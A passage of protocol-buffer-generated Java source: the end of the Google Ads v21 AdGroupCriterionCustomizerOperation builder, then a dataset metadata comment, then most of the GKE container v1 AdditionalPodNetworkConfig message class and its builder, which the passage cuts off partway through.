* </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 
[(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... 
}</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. 
*/ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new 
com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
// ---- dataset-concatenation metadata (NOT Java source): describes the embedded file that follows ----
// repo_id:   googleapis/google-cloud-java
// size:      35,765
// file_path: java-container/proto-google-cloud-container-v1/src/main/java/com/google/container/v1/AdditionalPodNetworkConfig.java
// NOTE(review): this chunk concatenates multiple protoc-generated files; both surrounding classes are
// marked "Generated by the protocol buffer compiler. DO NOT EDIT!" — regenerate from the .proto sources
// rather than hand-editing.
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/container/v1/cluster_service.proto // Protobuf Java Version: 3.25.8 package com.google.container.v1; /** * * * <pre> * AdditionalPodNetworkConfig is the configuration for additional pod networks * within the NodeNetworkConfig message * </pre> * * Protobuf type {@code google.container.v1.AdditionalPodNetworkConfig} */ public final class AdditionalPodNetworkConfig extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.container.v1.AdditionalPodNetworkConfig) AdditionalPodNetworkConfigOrBuilder { private static final long serialVersionUID = 0L; // Use AdditionalPodNetworkConfig.newBuilder() to construct. 
private AdditionalPodNetworkConfig(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdditionalPodNetworkConfig() { subnetwork_ = ""; secondaryPodRange_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AdditionalPodNetworkConfig(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.container.v1.AdditionalPodNetworkConfig.class, com.google.container.v1.AdditionalPodNetworkConfig.Builder.class); } private int bitField0_; public static final int SUBNETWORK_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object subnetwork_ = ""; /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The subnetwork. */ @java.lang.Override public java.lang.String getSubnetwork() { java.lang.Object ref = subnetwork_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); subnetwork_ = s; return s; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The bytes for subnetwork. 
*/ @java.lang.Override public com.google.protobuf.ByteString getSubnetworkBytes() { java.lang.Object ref = subnetwork_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); subnetwork_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SECONDARY_POD_RANGE_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object secondaryPodRange_ = ""; /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The secondaryPodRange. */ @java.lang.Override public java.lang.String getSecondaryPodRange() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); secondaryPodRange_ = s; return s; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The bytes for secondaryPodRange. */ @java.lang.Override public com.google.protobuf.ByteString getSecondaryPodRangeBytes() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); secondaryPodRange_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int MAX_PODS_PER_NODE_FIELD_NUMBER = 3; private com.google.container.v1.MaxPodsConstraint maxPodsPerNode_; /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return Whether the maxPodsPerNode field is set. 
*/ @java.lang.Override public boolean hasMaxPodsPerNode() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return The maxPodsPerNode. */ @java.lang.Override public com.google.container.v1.MaxPodsConstraint getMaxPodsPerNode() { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ @java.lang.Override public com.google.container.v1.MaxPodsConstraintOrBuilder getMaxPodsPerNodeOrBuilder() { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(subnetwork_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, subnetwork_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(secondaryPodRange_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, secondaryPodRange_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(3, getMaxPodsPerNode()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(subnetwork_)) { size += 
com.google.protobuf.GeneratedMessageV3.computeStringSize(1, subnetwork_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(secondaryPodRange_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, secondaryPodRange_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(3, getMaxPodsPerNode()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.container.v1.AdditionalPodNetworkConfig)) { return super.equals(obj); } com.google.container.v1.AdditionalPodNetworkConfig other = (com.google.container.v1.AdditionalPodNetworkConfig) obj; if (!getSubnetwork().equals(other.getSubnetwork())) return false; if (!getSecondaryPodRange().equals(other.getSecondaryPodRange())) return false; if (hasMaxPodsPerNode() != other.hasMaxPodsPerNode()) return false; if (hasMaxPodsPerNode()) { if (!getMaxPodsPerNode().equals(other.getMaxPodsPerNode())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + SUBNETWORK_FIELD_NUMBER; hash = (53 * hash) + getSubnetwork().hashCode(); hash = (37 * hash) + SECONDARY_POD_RANGE_FIELD_NUMBER; hash = (53 * hash) + getSecondaryPodRange().hashCode(); if (hasMaxPodsPerNode()) { hash = (37 * hash) + MAX_PODS_PER_NODE_FIELD_NUMBER; hash = (53 * hash) + getMaxPodsPerNode().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public 
static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static 
com.google.container.v1.AdditionalPodNetworkConfig parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.container.v1.AdditionalPodNetworkConfig prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * AdditionalPodNetworkConfig is the configuration for additional pod networks * within the NodeNetworkConfig message * </pre> * * Protobuf type {@code google.container.v1.AdditionalPodNetworkConfig} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.container.v1.AdditionalPodNetworkConfig) com.google.container.v1.AdditionalPodNetworkConfigOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.container.v1.AdditionalPodNetworkConfig.class, com.google.container.v1.AdditionalPodNetworkConfig.Builder.class); } // Construct using com.google.container.v1.AdditionalPodNetworkConfig.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getMaxPodsPerNodeFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; subnetwork_ = ""; secondaryPodRange_ = ""; maxPodsPerNode_ = null; if (maxPodsPerNodeBuilder_ != null) { maxPodsPerNodeBuilder_.dispose(); maxPodsPerNodeBuilder_ 
= null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstanceForType() { return com.google.container.v1.AdditionalPodNetworkConfig.getDefaultInstance(); } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig build() { com.google.container.v1.AdditionalPodNetworkConfig result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig buildPartial() { com.google.container.v1.AdditionalPodNetworkConfig result = new com.google.container.v1.AdditionalPodNetworkConfig(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.container.v1.AdditionalPodNetworkConfig result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.subnetwork_ = subnetwork_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.secondaryPodRange_ = secondaryPodRange_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000004) != 0)) { result.maxPodsPerNode_ = maxPodsPerNodeBuilder_ == null ? 
maxPodsPerNode_ : maxPodsPerNodeBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.container.v1.AdditionalPodNetworkConfig) { return mergeFrom((com.google.container.v1.AdditionalPodNetworkConfig) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.container.v1.AdditionalPodNetworkConfig other) { if (other == com.google.container.v1.AdditionalPodNetworkConfig.getDefaultInstance()) return this; if (!other.getSubnetwork().isEmpty()) { subnetwork_ = other.subnetwork_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getSecondaryPodRange().isEmpty()) { secondaryPodRange_ = other.secondaryPodRange_; bitField0_ |= 0x00000002; onChanged(); } if (other.hasMaxPodsPerNode()) { mergeMaxPodsPerNode(other.getMaxPodsPerNode()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder 
mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { subnetwork_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { secondaryPodRange_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { input.readMessage(getMaxPodsPerNodeFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object subnetwork_ = ""; /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The subnetwork. */ public java.lang.String getSubnetwork() { java.lang.Object ref = subnetwork_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); subnetwork_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The bytes for subnetwork. 
*/ public com.google.protobuf.ByteString getSubnetworkBytes() { java.lang.Object ref = subnetwork_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); subnetwork_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @param value The subnetwork to set. * @return This builder for chaining. */ public Builder setSubnetwork(java.lang.String value) { if (value == null) { throw new NullPointerException(); } subnetwork_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return This builder for chaining. */ public Builder clearSubnetwork() { subnetwork_ = getDefaultInstance().getSubnetwork(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @param value The bytes for subnetwork to set. * @return This builder for chaining. */ public Builder setSubnetworkBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); subnetwork_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object secondaryPodRange_ = ""; /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The secondaryPodRange. 
*/ public java.lang.String getSecondaryPodRange() { java.lang.Object ref = secondaryPodRange_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); secondaryPodRange_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The bytes for secondaryPodRange. */ public com.google.protobuf.ByteString getSecondaryPodRangeBytes() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); secondaryPodRange_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @param value The secondaryPodRange to set. * @return This builder for chaining. */ public Builder setSecondaryPodRange(java.lang.String value) { if (value == null) { throw new NullPointerException(); } secondaryPodRange_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return This builder for chaining. */ public Builder clearSecondaryPodRange() { secondaryPodRange_ = getDefaultInstance().getSecondaryPodRange(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @param value The bytes for secondaryPodRange to set. * @return This builder for chaining. 
